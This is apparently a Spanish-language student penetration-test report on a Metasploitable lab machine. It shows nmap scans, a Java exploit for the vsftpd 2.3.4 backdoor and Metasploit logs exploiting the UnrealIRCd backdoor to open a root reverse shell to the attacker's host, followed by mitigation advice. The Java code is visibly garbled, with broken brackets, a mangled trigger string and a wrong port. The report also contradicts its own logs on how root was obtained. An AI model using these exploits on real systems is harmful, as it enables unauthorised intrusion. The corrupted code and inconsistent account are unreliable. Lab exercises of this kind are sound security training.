

# Pentesting Technical Report

4Geeks

Ph: +1 786 345 5555

# 0. Índice

0. Índice	2
1. Introducción	3
2. Metodología	3
2.1 Reconocimiento	3
2.2 Escaneo y vulnerabilidades	3
3. Resultados de la Vulnerabilidad	4
3.1 Detalles de las vulnerabilidades	4
3.2 Herramientas usadas	8
4. Escalación de Privilegios	9
4.1 Escalación de privilegios mediante explotación de vsftpd 2.3.4	9
Explotación del backdoor en vsftpd 2.3.4	
4.2 Explotación de un backdoor en IRC	9
Explotación de vulnerabilidad en IRC	9
5 . Mitigación5	10
5.1 Propuestas para prevenir vulnerabilidades	10
5.2 Propuestas para remediar vulnerabilidades explotadas	
6. Conclusión	11

### 1. Introducción

El principal objetivo de esta práctica sería sacar información de un entorno preparado para ser atacado y saber que herramientas y cómo podemos explotar dicho entorno.

El alcance definido:

- ☐ Sistemas o direcciones IP incluidas.
- ☐ Restricciones establecidas
- ☐ Tiempo o duración de las pruebas

# 2. Metodología

### 2.1 Reconocimiento

Para sacar la ip de máquina usamos la herramienta nmap,con la cual realizamos un escaneo completo de la red y los sistemas operativos conectados:

nmap -sn 192.168.1.0/24:

```
nmap -sn 192.168.1.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-13 14:22 CEST
Nmap scan report for 192.168.1.1
Host is up (0.0087s latency).
MAC Address: 8C:19:B5:FF:E2:1F (Arcadyan)
Nmap scan report for 192.168.1.10
Host is up (0.014s latency).
MAC Address: D8:BC:38:68:01:80 (Espressif)
Nmap scan report for 192.168.1.11
Host is up (0.054s latency).
MAC Address: C8:2E:18:80:A3:00 (Espressif)
Nmap scan report for 192.168.1.12
Host is up (0.048s latency).
MAC Address: C0:95:CF:1A:72:C2 (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.043s latency).
MAC Address: 2C:93:FB:7D:C8:00 (Sercomm France Sarl)
Nmap scan report for 192.168.1.14
Host is up (0.0024s latency).
MAC Address: 2C:08:23:D8:D9:F0 (Sercomm France Sarl)
Nmap scan report for 192.168.1.24
Host is up (0.00039s latency).
MAC Address: 08:00:27:54:14:FB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.19
Host is up.
   ap done: 256 IP addresses (8 hosts up) scanned in 2.15 seconds
```

### 2.2 Escaneo y vulnerabilidades

Una vez conocemos la ip\_victima pasamos a comprobar las vulnerabilidades que tiene:

- nmap -sS -sV -O ip victima:

```
$ nmap -sS -sV -0 192.168.1.24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-13 18:33 CEST
Nmap scan report for 192.168.1.24
Host is up (0.00040s latency).
Not shown: 977 closed tcp ports (reset)
         STATE SERVICE
                                   VERSION
21/tcp open ftp
                                   vsftpd 2.3.4
                                  OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
Linux telnetd
22/tcp
          open ssh
23/tcp
                  telnet
          open
25/tcp
                                  Postfix smtpd
          open
                   smtp
53/tcp
                   domain
                                  ISC BIND 9.4.2
          open
80/tcp open
                   http
                                  Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
111/tcp open
139/tcp open
512/tcp open
                                   netkit-rsh rexecd
513/tcp open
514/tcp open
                   login
                                   OpenBSD or Solaris rlogind
                  tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
1099/tcp open
2049/tcp open nfs
                                   2-4 (RPC #100003)
2121/tcp open ftp
                                   ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc
                                  VNC (protocol 3.3)
6000/tcp open X11
                                   (access denied)
6667/tcp open irc
                                   UnrealIRCd
8009/tcp open ajp13
8180/tcp open http
                                  Apache Jserv (Protocol v1.3)
Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:54:14:FB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: ˈmetasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds
```

# 3. Resultados de la Vulnerabilidad

### 3.1 Detalles de las vulnerabilidades

Con este comando podemos ver las vulnerabilidades además de la versión y los puertos abiertos. Otra forma de verlo podría ser:

nmap -sV –script=vuln ip\_victima:

Con ello podemos ver que la máquina es vulnerable por el puerto 21 a una conexión de tipo ftp ya que la máquina tiene la versión vsftpd 2.3.4.Lo primero de todo es saber que és,vsftpd es un servidor ftp que se usa principalmente en Linux con el cuál no podemos conectar de manera remota a un ordenador,pero en esta versión,existe la siguiente vulnerabilidad conocida como CVE-2011-2523 esta se caracteriza por abrir una puerta trasera(backdoor),en el puerto 6200 por el protocolo tcp y con un sencillo exploit podemos entrar en el servidor. script en java:

```
import java.io.*;
import java.net.*;
public class VsftpdExploit [
       public static void main(String[] args) (
   if (args.length < 2) (</pre>
                        (args.length < 2) (
System.out.println("Uso: java VsftpdExploit <target_ip> <target_port>");
System.out.println("Ejemplo: java VsftpdExploit 192.168.1.24");
             String targetIp = args[0];
int targetPort = Integer.parseInt(args[1]);
                        BufferedReader in = new BufferedReader(new InputStreamReader(socket.getInputStream()));
PrintWriter out = new PrintWriter(socket.getOutputStream(), true);
                        String banner = in.readLine();
System.out.println("[+] Servidor: " + banner);
                        // Verificar si es vsftpd 2.3.4
if (!banner.contains("vsFTPd 2.3.4")) {
    System.out.println("[-] El servidor no parece ser vsftpd 2.3.4 vulnerable");
    socket.close();
                        // Activar la backdoor enviando el usuario con :)
System.out.println("[+] Activando backdoor...");
out.println("USER usuario:["); // Payload malicioso
out.println("PASS cualquiercosa");
                              y {
   Socket backdoor = new Socket(targetIp, 6280);
   System.out.println("[+] ;Backdoor conectada con éxito!");
                                // Configurar streams para la shell interactiva
BufferedReader backdoorIn = new BufferedReader(new InputStreamReader|backdoor.getInputStream()));
PrintWriter backdoorOut = new PrintWriter(backdoor.getOutputStream(), true);
BufferedReader userInput = new BufferedReader(new InputStreamReader(System.in));
                                // Leer la salida inicial de la backdoor
String line;
while {(line = backdoorIn.readLine{}) != null) {
    System.out.println(line);
                                         System.out.print("5");
                                        if (command.equalsIgnoreCase("exit")) (
                                            // Leer la salida del comando
shile ((line = backdoorIn.readLine()) != null) {
   if (line.isEmpty()) break;
   System.out.println(line);
                                atch (ConnectException e) (
System.out.println("[-] No se pudo conectar a la backdoor: " + e.getMessage());
System.out.println("[-] El servidor puede no ser vulnerable o la backdoor no se activó");
                        socket.close();
                        stch (Exception e) (
System.err.println("[-] Error: " + e.getMessage());
e.printStackTrace();
```

Además de esta vulnerabilidad podemos encontrar otra como podría ser la de irc:

```
msf6 exploit(
                                                           ) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
              Current Setting Required Description
   Name
                                                 The local client address
                                   no The local client port
no A proxy chain of format type:host:port[
,type:host:port][...]
yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
   CPORT
   Proxies
   RHOSTS 192.168.1.24
                                                 cs/using-metasploit.html
                                              The target port (TCP)
   RPORT
               6667
Exploit target:
   Id Name
       Automatic Target
View the full module info with the info, or info -d command.
                    //re/unreal_ired_3281_backdoor) > set LHOST 192.168.1.19
msf6 exploit(
 !] Unknown datastore option: LHOST. Did you mean RHOST?
LHOST => 192.168.1.19
LNOST
msf6 exploit(unix/irr/unicat_irro_sss___
CHOST => 192.168.1.19
msf6 exploit(unix/irr/unreal_irro_3281_backdoor) > set CPORT 4445
CPORT => 4445
CPORT => 4445
msf6 exploit(
                                                           r) > payload
    Unknown command: payload. Run the help command for more details.
   6 exploit(nnix/irc/unreal_ircd_3281_backdoor) > payload cmd/unix/reverse
Unknown command for more details.
<u>msf6</u> exploit(
<u>msf6</u> exploit(
                                                           ·) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 192.168.1.19:4444
[*] 192.168.1.24:6667 - Connected to 192.168.1.24:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
 *] 192.168.1.24:6667 - Sending backdoor command...
 *] Accepted the first client connection...
*] Accepted the second client connection...
 Command: echo ij170e49GRJpMCNj;
 *] Writing to socket A
 Writing to socket BReading from sockets...
   Reading from socket B
 *] B: "ij170e49GRJpMCNj\r\n"
 *] Matching...
 . Osmmand shell session 1 opened (192.168.1.19:4444 -> 192.168.1.24:47764) at 2025-05-14 20:19:48 +0200
Donation
LICENSE
aliases
badwords.channel.conf
badwords.message.conf
badwords.quit.conf
curl-ca-bundle.crt
doc
help.conf
ircd.tune
modules
networks
spamfilter.conf
tmp
unreal
unrealircd.conf
```

Es otro tipo de vulnerabilidad muy parecida a la de ftp,en ambas obtenemos una reverse shell en la que podemos ejecutar los comando que necesitemos,a esta vulnerabilidad se le conoce como CVE-2010-2075

### 3.2 Herramientas usadas

Las herramientas que hemos usado para la explotación y búsqueda de vulnerabilidades son:

- nmap: esta herramienta la hemos usado para escanear puertos, vulnerabilidades que tiene la máquina además de incluso poder encontrar la ip de la máquina la que queremos atacar
- msfconsole:este es el comando para poder abrir metasploit y poder usar dicha herramienta para obtener por ejemplo una reverse shell:
- vsftpd:primero buscamos la vulnerabilidad con un search vsftpd:

copiamos la ruta del exploit y lo usamos,para ello usaremos RHOST y RPORT como parámetros donde meteremos en los datos de la máquina víctima,una vez lo tengamos con un run ya se ejecutará y tendremos acceso a root:

```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.1.24
RHOST => 192.168.1.24
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.1.24:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.24:21 - USER: 331 Please specify the password.
[*] 192.168.1.24:21 - Backdoor service has been spawned, handling...
[*] 192.168.1.24:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.19:37327 -> 192.168.1.24:6200) at 2025-05-14 20:55:41 +0200
whoami
root
```

- irc: para esta vulnerabilidad,hacemos exactamente lo mismo que el anterior cambiando en este caso que tendremos que añadir los parámetros CHOST y CPORT donde indicaremos la ip de donde estamos atacando y un puerto que esté disponible.
- nc: este comando es netcat, gracias a este podemos ver si existe vulnerabilidades en la máquina(nc ip\_victima 6667) donde indicas ip y puerto.

# 4. Escalación de Privilegios

# 4.1 Escalación de privilegios mediante explotación de vsftpd 2.3.4

Explotación del backdoor en vsftpd 2.3.4

Técnica: Explotación de un backdoor conocido en vsftpd 2.3.4 que permitía una conexión remota sin autenticación a un shell del sistema.

#### Pasos:

- Identificación: Se realizó una conexión al puerto FTP del servidor (21), detectando que el servidor tenía una versión vulnerable de vsftpd.
- Explotación: Utilizando Metasploit, se explotó la vulnerabilidad, y se estableció una shell remota en la máquina víctima.
- Resultado: Se obtuvo acceso al sistema como usuario limitado, y posteriormente se escaló a root mediante la ejecución de otros exploits.

A través de una simple conexión FTP, se consiguió acceso sin autenticación y se permitió la escalación posterior a privilegios de root.

### 4.2 Explotación de un backdoor en IRC

Explotación de vulnerabilidad en IRC

Técnica: Aprovechamiento de un backdoor intencional en UnrealIRCd 3.2.8.1, permitiendo ejecutar comandos remotos como root.

#### Pasos:

- Identificación: Se identificó que el servidor IRC vulnerable tenía el backdoor activo, lo que permitía ejecutar comandos arbitrarios.
- Explotación: A través de Metasploit, se explotó esta vulnerabilidad para ejecutar una shell remota, obteniendo así control total del sistema con privilegios de root.

 Resultado: Después de ejecutar el exploit, la conexión fue establecida con éxito, obteniendo acceso root en el servidor.

La explotación permitió que un atacante remoto pudiera ejecutar comandos arbitrarios, lo que comprometió completamente el sistema. Se obtuvo acceso root sin autenticación, lo que facilita un ataque persistente.

# 5. Mitigación

### 5.1 Propuestas para prevenir vulnerabilidades

- Una de las posibilidades más factibles sería implementar un Web Application Firewall también llamado WAF el cuál nos avisa si existe algún tipo de actividad sospechosa.
- Antes de lanzar una aplicación a producción testear en todos los ámbitos(código,pentest...)
- Limitar privilegios a los usuarios.
- Proteger información que pueda ser confidencial o sensible con un cifrado SSL.
- Realizar copias de seguridad cada x tiempo.

# 5.2 Propuestas para remediar vulnerabilidades explotadas

- Actualizar servicios vulnerables
- Actualizar vsftpd a una versión segura (≥ 3.0.0).
- Eliminar cualquier versión de UnrealIRCd anterior a 3.2.9.
- Recomendar reinstalar desde fuentes oficiales.
- Revisar configuraciones de red y firewall
- Restringir el acceso a puertos innecesarios (como 21 o 6667) desde redes no autorizadas.
- Auditoría de usuarios y privilegios

- Analizar qué usuarios tienen acceso sudo o root, y aplicar el principio de mínimo privilegio.
- Establecer autenticación multifactor para accesos administrativos.

# 6. Impacto potencial

El principal impacto que podemos ver si implementamos estas medidas, serían:

- Mayor seguridad: Usando un WAF como podría ser SafeLine el cúal es muy potente y nos indica tanto posibles ataques como actividad sospechosa
- 2. Con una medida de privilegios obtenemos que desde la propia empresa por mucho que quieran realizar un ataque no puedan debido a la escala de privilegios.
- 3. Al cifrar información sensible como por ejemplo una contraseña con bcrypt o cualquier otro hash podemos hacer que si llegan a este tipo de información sigan sin saber la contraseña lo que es realmente útil.

### 7. Conclusión

- Durante la evaluación de seguridad, se identificaron múltiples vulnerabilidades críticas que permitieron comprometer completamente el sistema:
- Acceso remoto sin autenticación mediante un backdoor en vsftpd.
- Ejecución remota de comandos como root por medio de un UnrealIRCd vulnerable.
- El impacto de estas vulnerabilidades es crítico, ya que permitieron la obtención de una shell remota como root con control total del sistema, pudiendo alterar archivos, crear usuarios, o exfiltrar datos.
- Este ejercicio demuestra la importancia de mantener actualizado el software, aplicar configuraciones seguras, y monitorear continuamente

la infraestructura. La explotación fue posible gracias a servicios olvidados o desactualizados y a la falta de segmentación de red.

• Se recomienda actuar de forma inmediata sobre las propuestas de mitigación y considerar una revisión más profunda de otros sistemas en la misma red para evitar futuros compromisos.